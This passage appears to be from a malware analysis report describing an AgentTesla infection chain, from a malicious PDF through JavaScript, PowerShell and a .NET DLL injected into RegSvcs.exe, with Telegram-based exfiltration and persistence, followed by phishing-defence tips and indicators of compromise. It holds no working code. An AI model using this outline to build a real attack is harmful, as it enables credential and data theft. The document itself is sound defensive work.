The chain of events begins with the delivery of a PDF file containing malicious content. Upon opening the PDF, the embedded malicious code triggers the execution of a JavaScript payload, leading to the download and execution of a PowerShell script. This PowerShell script then decrypts and executes a binary, in the form of a .NET DLL, which injects the AgentTesla payload into legitimate processes to evade detection. The malware communicates with its command-and-control infrastructure, exfiltrating sensitive data through Telegram bots for stealthy transmission. To ensure persistence, the malware establishes scheduled tasks and registry entries, allowing it to execute periodically and maintain its presence on the infected system. In the old version of Acrobat Reader, opening the PDF triggered the automatic execution of the malicious JavaScript, leading to the injection of AgentTesla via PowerShell into RegSvcs.exe. Inspection of the PDF streams revealed the embedded script, further confirming that the exploitation required no user interaction. This orchestrated sequence underscores the sophisticated nature of the attack, spanning from initial infection to data exfiltration and persistent infiltration, and posing significant challenges for detection and mitigation.

Mitigation:

Avoiding falling victim to email phishing requires a vigilant and cautious approach. Here are some common practices to help prevent falling prey to email phishing:

  • Verify Sender Information
  • Think Before Clicking Links and Dismissing Warnings
  • Check for Spelling and Grammar Errors
  • Be Cautious with Email Content
  • Verify Unusual Requests
  • Use Email Spam Filters
  • Check for Secure HTTPS Connections
  • Delete Suspicious Emails
  • Keep Windows and Security Software Up to Date
  • Use the latest and patched version of Acrobat Reader

Indicators of Compromise (IOCs)

PDF 8f8264c173e6d036e87b706dbb87e3036ae17df32e53a683c87bff94fce2c242
Javascript 3ea81c292f36f2583d2291e8a393014da62767447dba7b139a6c45574647aa2b
ps1 file db726e060f4feccf4bdfa843e3c10cbac80509585fd55c6d1bfce5e312a4e429
dll 5b6d8f91201ba9c879e46062190817954e28ceb61a67e55870bb61d1960854ee
exe dec2ce698ab8600d96dd3353b5e47d802441c6df18aed1dd6a2b78311369659e
IPv4 149.154.167.220
URL http://htloctmain25.blogspot[.]com/atom.xml
URL https://bio0king[.]blogspot[.]com

Desk 1: Indicators of Compromise